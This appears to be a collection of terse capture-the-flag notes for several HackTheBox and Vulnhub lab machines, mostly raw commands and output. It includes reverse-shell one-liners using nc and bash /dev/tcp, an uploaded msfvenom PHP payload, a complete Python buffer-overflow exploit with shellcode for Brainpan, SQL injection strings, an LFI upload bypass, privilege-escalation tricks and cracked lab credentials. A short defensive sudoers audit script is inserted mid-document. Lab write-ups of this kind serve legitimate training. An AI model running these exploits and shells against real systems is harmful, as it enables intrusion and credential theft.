source: https://www.hackthebox.eu/home/machines/profile/2
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
smb-vuln-cve2009-3103
smb-vuln-ms08-067
smb-vuln-ms17-010
ms08-067
TODO: but actually I cannot get reverse shell without the help of metasploit exploits
ms17-010 download nc.exe via FTP, then get reverse shell
Wednesday, October 16, 2019
HackTheBox: Lame
source: https://www.hackthebox.eu/home/machines/profile/1
my ip: 10.10.14.2
10.10.10.3
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc 10.10.14.2 443 -e /bin/bash'"
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
Vulnhub: pWnOS: 2.0 (Pre-Release)
source: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
change to dhcp:
init=/bin/bash
mount -o remount,rw /
vim /etc/network/interfaces
then reboot
192.168.1.8
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
maybe ubuntu 12.04
/info/
/info.php
/login/
/register
/activate
/blog
/includes
PHP Version 5.3.5-1ubuntu7
http://192.168.1.8/blog/
https://www.exploit-db.com/exploits/1191
Simple PHP Blog 0.4.0 - Multiple Remote s
perl ./1191.pl -h http://192.168.1.8/blog -e 1
perl ./1191.pl -h http://192.168.1.8/blog -e 3 -U foo -P bar
http://192.168.1.8/blog/images/cmd.php?cmd=id
reverse shell:
login, upload rs.php
http://192.168.1.8/blog/images/rs.php
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 11.04"
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
cat /var/www/mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
mysql -uroot -pgoodday -e "SHOW DATABASES"
ERROR 1045
https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Vulnhub: pWnOS: 1.0
source: https://www.vulnhub.com/entry/pwnos-10,33/
192.168.1.6
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
maybe ubuntu 7.10
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index2 (Status: 200)
/index1 (Status: 200)
/index2.php (Status: 200)
/index.php (Status: 200)
/php (Status: 301)
local file inclusion:
http://192.168.1.6/index1.php?help=false&connect=../../../../etc/passwd
samba 3.0.26a
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl ./2017.pl 192.168.1.6 10000 /etc/issue 0
perl ./2017.pl 192.168.1.6 10000 /etc/passwd 0
perl ./2017.pl 192.168.1.6 10000 /etc/shadow 0
perl ./2017.pl 192.168.1.6 10000 /home/obama/.ssh/authorized_keys 0
https://github.com/g0tmi1k/debian-ssh
ssh -i ./common_keys/rsa/2048/dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.1.6
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 7.10"
https://www.exploit-db.com/exploits/8478
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation
Vulnhub: SickOs: 1.2
source: https://www.vulnhub.com/entry/sickos-12,144/
192.168.1.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
maybe ubuntu 11.10/12.04
/index.php
/test/
/~sys~
curl -v -o /dev/null -s -XOPTIONS http://192.168.1.5/test/
MS-Author-Via: DAV
reverse shell:
msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=443 -f raw > rs.php
nmap -p 80 192.168.1.5 --script http-put --script-args http-put.url='/test/rs.php',http-put.file='./rs.php'
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
https://www.exploit-db.com/exploits/33899
Chkrootkit 0.49 - Local Privilege Escalation
echo "chmod +s /bin/bash" > /tmp/update
Tuesday, October 15, 2019
Vulnhub: SickOs: 1.1
source: https://www.vulnhub.com/entry/sickos-11,132/
192.168.1.107
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
maybe ubuntu 11.10/12.04
gobuster dir -p http://192.168.1.107:3128 -u http://192.168.1.107 -w /usr/share/seclists/Discovery/Web-Content/common.txt
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/connect (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
curl --proxy http://192.168.1.107:3128 http://192.168.1.107/robots.txt
Dissalow: /wolfcms
http://192.168.1.107/wolfcms/docs/updating.txt
v0.8.2
https://github.com/wolfcms/wolfcms/tree/0.8.2/wolf
http://192.168.1.107/wolfcms/?/admin/login
username admin, password admin
reverse shell:
upload rs.php
http://192.168.1.107/wolfcms/public/rs.php
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
cat /var/www/wolfcms/config.php
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
ssh username sickos, password john@123
Vulnhub: VulnOS: 2
source: https://www.vulnhub.com/entry/vulnos-2,147/
192.168.1.106
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
maybe ubuntu 14.04
ngircd-21 (i686/pc/linux-gnu)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
http://192.168.1.106/jabc
/includes (Status: 301)
/misc (Status: 301)
/modules (Status: 301)
/profiles (Status: 301)
/robots.txt (Status: 200)
/scripts (Status: 301)
/sites (Status: 301)
/templates (Status: 301)
/themes (Status: 301)
/index.php (Status: 200)
/xmlrpc.php (Status: 200)
http://192.168.1.106/jabc/profiles/standard/standard.info
version = "7.26"
http://192.168.1.106/jabc/?q=node/7
For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest
http://192.168.1.106/jabcd0cs
username guest, password guest
OpenDocMan v1.2.7
https://www.exploit-db.com/exploits/32075
OpenDocMan 1.2.7 - Multiple Vulnerabilities
http://192.168.1.106/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,schema_name,3,4,5,6,7,8,9%20from%20information_schema.schemata
SELECT 1,schema_name,3,4,5,6,7,8,9 FROM information_schema.schemata
drupal7
jabcd0cs
SELECT 1,concat(table_schema,0x3a,table_name),3,4,5,6,7,8,9 FROM information_schema.tables
drupal7:users
jabcd0cs:odm_user
mysql:user
SELECT 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 FROM information_schema.columns
drupal7:users:name
drupal7:users:pass
jabcd0cs:odm_user:username
jabcd0cs:odm_user:password
mysql:user:User
mysql:user:Password
SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9 FROM jabcd0cs.odm_user
webmin:b78aae356709f8c31118ea613980954b -> webmin1980
SELECT 1,concat(name,0x3a,pass),3,4,5,6,7,8,9 FROM drupal7.users
webmin:$S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug
SELECT 1,concat(User,0x3a,Password),3,4,5,6,7,8,9 FROM mysql.user
root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
debian-sys-maint:*6BC5901B87B5DF07E1C2BA75C15C537EB6B4078B
phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
drupal7:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
ssh username webmin, password webmin1980
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu 14.04.4 LTS"
/etc/passwd
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
https://www.exploit-db.com/exploits/37292
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
Monday, October 14, 2019
Vulnhub: VulnOS: 1
source: https://www.vulnhub.com/entry/vulnos-1,60/
192.168.1.105
ubuntu server 10.04 LTS
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp open distccd distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp open irc IRCnet ircd
8070/tcp open ucs-isc?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open http MiniServ 0.01 (Webmin httpd)
38175/tcp open nlockmgr 1-4 (RPC #100021)
41631/tcp open mountd 1-3 (RPC #100005)
55692/tcp open status 1 (RPC #100024)
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
/.htaccess (Status: 200)
/cgi-bin/ (Status: 403)
/imgs (Status: 301)
/index (Status: 200)
/index.html (Status: 200)
/index2 (Status: 200)
/javascript (Status: 301)
/mediawiki (Status: 301)
mediawiki v1.15.1
/phpldapadmin (Status: 301)
phpLDAPadmin v1.2.0.5
/phpmyadmin (Status: 301)
phpmyadmin v3.3.2.0
/phppgadmin (Status: 301)
phpPgAdmin v4.2.2 (PHP 5.3.2-1ubuntu4.23)
/server-status (Status: 403)
/drupal6 (Status: 301)
/DVWA-1.0.8
http://192.168.1.105/DVWA-1.0.8/login.php
username admin, password password
/egroupware (Status: 301)
stylite’s egroupware v1.8
/phpgroupware (Status: 301)
phpGroupWare 1:0.9.16.012+dfsg-10 (Debian)
/phpsysinfo (Status: 301)
phpsysinfo v3.0.4
2.6.32-57-generic-pae (SMP) i686
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl 2017.pl 192.168.1.105 10000 /etc/passwd 0
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
webmin:x:1002:1002::/home/webmin:/bin/sh
hackme:x:1003:1003::/home/hackme:/bin/sh
sa:x:1004:1004::/home/sa:/bin/sh
stupiduser:x:1005:1005::/home/stupiduser:/bin/sh
perl 2017.pl 192.168.1.105 10000 /etc/shadow 0
vulnosadmin:$6$SLXu95CH$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p.xbnSVJFAeg1WO28ljNAPrlXaghLmo/:16137:0:99999:7:::
sysadmin:admin:16137:0:99999:7:::
webmin:webmin:16137:0:99999:7:::
hackme:hackme:16137:0:99999:7:::
sa:password1:16137:0:99999:7:::
stupiduser:stupiduser:16137:0:99999:7:::
http://192.168.1.105/DVWA-1.0.8/vulnerabilities/exec/
; echo "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'\");?>" > /var/www/dolibarr-3.0.0/rs.php
http://192.168.1.105/dolibarr-3.0.0/rs.php
cp /home/hackme/vulnleaks.pdf.zip /var/www/dolibarr-3.0.0
john vulnleaks.pdf.zip:
password admins
cp /home/sysadmin/user_bankaccounts.ods /var/www/dolibarr-3.0.0
vulnosadmin 125487-9821211-5987 4574 1256000$
root 156987-1458971 9871 569000000$
sa 48726987-89578 7412 450000$
webmin 48741269-5897412 7485 130050$
/var/www/webERP/config.php:
$DBUser = 'root';
$DBPassword = 'toor';
mysql username root, password toor
http://192.168.1.105/dolibarr-3.0.0/htdocs/
username vulnosadmin, password vulnosadmin
http://192.168.1.105/webERP/
username admin, password weberp
username WEB0000017, password weberp
http://192.168.1.105/drupal6/
username drupal6, password drupal6
username webmin, password
http://192.168.1.105/DVWA-1.0.8/login.php
username admin, password password
username gordonb, password abc123
username 1337, password charley
username pablo, password letmein
username smithy, password password
Vulnhub: Mr-Robot: 1
source: https://www.vulnhub.com/entry/mr-robot-1,151/
192.168.1.103
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
+ OSVDB-3092: /admin/: This might be interesting…
+ Uncommon header 'link' found, with contents: <http://192.168.1.103/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
http://192.168.1.103/feed/
wordpress v4.3.20
http://192.168.1.103/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
http://192.168.1.103/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
http://192.168.1.103/fsocity.dic
https://mrrobot.fandom.com/wiki/Characters
username elliot
cat fsocity.dic | sort | uniq > fsocity_uniq.dic
wpscan --url http://192.168.1.103 --usernames elliot -P ./fsocity_uniq.dic
username elliot, password ER28-0652
wpscan --url http://192.168.1.103 --usernames mich05654 -P ./fsocity_uniq.dic
username mich05654, password Dylan_2791
Appearance->Editor 404.php
http://192.168.1.103/404.php
system('ls -la');
system('cat you-will-never-guess-this-file-name.txt');
hello there person who found me.
reverse shell:
system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'");
find / -type f -name "key-2-of-3.txt" 2>/dev/null
/home/robot/key-2-of-3.txt
ls -l /home/robot
key-2-of-3.txt
password.raw-md5
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
john:
username robot, password abcdefghijklmnopqrstuvwxyz
python -c "import pty; pty.spawn('/bin/bash');"
su robot
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Friday, October 11, 2019
Vulnhub: Brainpan: 1
source: https://www.vulnhub.com/entry/brainpan-1,51/
192.168.1.97
#!/usr/bin/python
import socket
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.90 LPORT=443 EXITFUNC=thread -f python -v payload -b "\x00"
payload = b""
payload += b"\xda\xdc\xbe\x1b\xe9\x6c\x36\xd9\x74\x24\xf4\x58"
payload += b"\x33\xc9\xb1\x12\x31\x70\x17\x03\x70\x17\x83\xf3"
payload += b"\x15\x8e\xc3\x32\x3d\xb8\xcf\x67\x82\x14\x7a\x85"
payload += b"\x8d\x7a\xca\xef\x40\xfc\xb8\xb6\xea\xc2\x73\xc8"
payload += b"\x42\x44\x75\xa0\x94\x1e\x84\x6a\x7d\x5d\x87\x8b"
payload += b"\xc6\xe8\x66\x3b\x5e\xbb\x39\x68\x2c\x38\x33\x6f"
payload += b"\x9f\xbf\x11\x07\x4e\xef\xe6\xbf\xe6\xc0\x27\x5d"
payload += b"\x9e\x97\xdb\xf3\x33\x21\xfa\x43\xb8\xfc\x7d"
#buffer = 'A' * (528-len(payload)) + "DCBA"
# 311712F3 JMP ESP
buffer = 'A' * 524 + "\xF3\x12\x17\x31" + "\x90"*16 + payload + "\x90"*(1000-528-len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.1.99', 9999))
s.connect(('192.168.1.97', 9999))
data = s.recv(1024)
s.send(buffer)
s.close()
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu quantal (12.10)"
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
Thursday, October 10, 2019
Vulnhub: SkyTower: 1
source: https://www.vulnhub.com/entry/skytower-1,96/
192.168.1.100
nmap:
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
nikto:
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
gobuster:
/background (Status: 200)
/index (Status: 200)
debian 7
sql injection:
email a' || 1=1 ;#--
password 123
john@skytech.com
username: john
password: hereisjohn
proxychains:
http 192.168.1.100 3128
ssh:
proxychains ssh john@192.168.1.100 cat /etc/passwd
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
add key:
proxychains ssh-copy-id john@192.168.1.100
reverse shell:
proxychains ssh john@192.168.1.100 "nc 192.168.1.90 443 -e /bin/bash"
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
head /var/www/login.php:
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
mysql -uroot -proot SkyTech -sN -e "select * from login"
1 john@skytech.com hereisjohn
2 sara@skytech.com ihatethisjob
3 william@skytech.com senseable
proxychains ssh-copy-id sara@192.168.1.100
proxychains ssh sara@192.168.1.100 sudo -l
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
proxychains ssh sara@192.168.1.100 "sudo /bin/cat /accounts/* /etc/shadow"
proxychains ssh sara@192.168.1.100 "sudo /bin/cat /accounts/* /root/flag.txt"
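Why the `sudo -l` entry above lets `/bin/cat /accounts/*` take a second path: sudoers matches the joined argument string against the glob, so `*` spans spaces and `/`. An added audit sketch, not part of the original notes; `fnmatch` only approximates sudo's matcher, and `/accounts/report.txt` and `/outside/file` are made-up names.

```python
import fnmatch
import re

# The rule line recorded from `sudo -l` in the notes above.
SUDO_L_LINE = "(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*"

ENTRY_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*"        # (root)
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"      # optional tags such as NOPASSWD:
    r"(?P<cmd>/\S+)\s*(?P<args>.*)$"   # command path, then its argument pattern
)


def parse_rules(line):
    """Split one `sudo -l` rule line into a list of rule dicts."""
    rules = []
    # Entries are comma-separated; each one starts with its "(runas)" part.
    for entry in re.split(r",\s*(?=\()", line.strip()):
        m = ENTRY_RE.match(entry)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "cmd": m.group("cmd"),
            "args": m.group("args").strip(),
        })
    return rules


def args_allowed(rule, argv):
    """Approximate sudoers argument matching.

    sudoers joins the arguments into one string and glob-matches it, so '*'
    can span spaces and '/'. fnmatchcase treats '*' the same way.
    (Simplification: sudoers backslash escapes are not modelled.)
    """
    if not rule["args"]:
        return True  # no argument pattern: any arguments are accepted
    return fnmatch.fnmatchcase(" ".join(argv), rule["args"])


def audit(rule):
    """Return findings for a rule whose argument pattern uses '*'."""
    findings = []
    pattern = rule["args"]
    if "*" not in pattern:
        return findings
    # Probe 1: the intended argument followed by an extra, unrelated path.
    if args_allowed(rule, [pattern.replace("*", "x"), "/outside/file"]):
        findings.append("'*' spans word boundaries: extra arguments accepted")
    # Probe 2: '..' inside the part covered by the wildcard.
    if args_allowed(rule, [pattern.replace("*", "../outside/file")]):
        findings.append("'*' matches '/': '..' traversal accepted")
    return findings


def report(line):
    """Map each rule on the line to its list of findings."""
    return {f'{r["cmd"]} {r["args"]}': audit(r) for r in parse_rules(line)}


if __name__ == "__main__":
    for rule_text, findings in report(SUDO_L_LINE).items():
        print(rule_text, "->", findings or "ok")
    # Hypothetical tightened rule: one named file instead of a glob.
    print(report("(root) NOPASSWD: /bin/cat /accounts/report.txt"))
```
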
Vulnhub: PwnLab: init
source: https://www.vulnhub.com/entry/pwnlab-init,158/
192.168.1.95
nmap:
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
53409/tcp open status 1 (RPC #100024)
debian 8 jessie
nikto:
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
local file inclusion:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
mysql -h192.168.1.95 -uroot -pH4u%QJ_H99 -sN -e "select * from Users.users"
kent Sld6WHVCSkpOeQ== -> JWzXuBJJNy
mike U0lmZHNURW42SQ== -> SIfdsTEn6I
kane aVN2NVltMkdSbw== -> iSv5Ym2GRo
login username kent, password JWzXuBJJNy
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
upload bypass:
http://192.168.1.95/?page=php://filter/convert.base64-encode/resource=upload
use burp, change php-> gif, mime image/gif, add header GIF89a;
get reverse shell:
lang ../upload/xxx.gif
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
privilege escalation:
username kane, password iSv5Ym2GRo
strings ~/msgmike
export PATH="/home/kane:$PATH"
echo "/bin/bash -p" > ./cat
chmod +x cat
./msgmike
strings /home/mike/msg2root
/bin/echo %s >> /root/messages.txt
./msg2root
1; chmod +s /bin/bash
/bin/bash -p
actually I need to create another reverse shell to cat the content of the flag.txt
Wednesday, October 9, 2019
Vulnhub: Stapler: 1
source: https://www.vulnhub.com/entry/stapler-1,150/
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
mysql -uroot -pplbkac -sN -e "SELECT user_login, user_pass FROM wordpress.wp_users"
192.168.1.94
nmap:
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http PHP cli server 5.5 or later
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
maybe ubuntu 16.04
ftp anonymous login:
Harry, make sure to update the banner when you get a chance to show who has access here
cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
nikto -host 192.168.1.94:
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
nikto -host 192.168.1.94 -port 12380 -ssl:
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ /phpmyadmin/: phpMyAdmin directory found
gobuster dir -k -u https://192.168.1.94:12380 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s "200,301,302" -t 4:
/announcements (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/robots.txt (Status: 200)
enum4linux:
[+] Attempting to map shares on 192.168.1.94
//192.168.1.94/print$ Mapping: DENIED, Listing: N/A
//192.168.1.94/kathy Mapping: OK, Listing: OK
//192.168.1.94/tmp Mapping: OK, Listing: OK
//192.168.1.94/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
smbclient //192.168.1.94/kathy -N
wordpress 4.2.1
hydra:
username SHayslett, password SHayslett
username Drew, password qwerty
ssh:
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
mysql -uroot -pplbkac -sN -e "SELECT user_login, user_pass FROM wordpress.wp_users"
john-the-ripper:
garry:football
harry:monkey
scott:cookie
kathy:coolgirl
barry:washere
John:incorrect
tim:thumb
Pam:0520
heather:passphrase
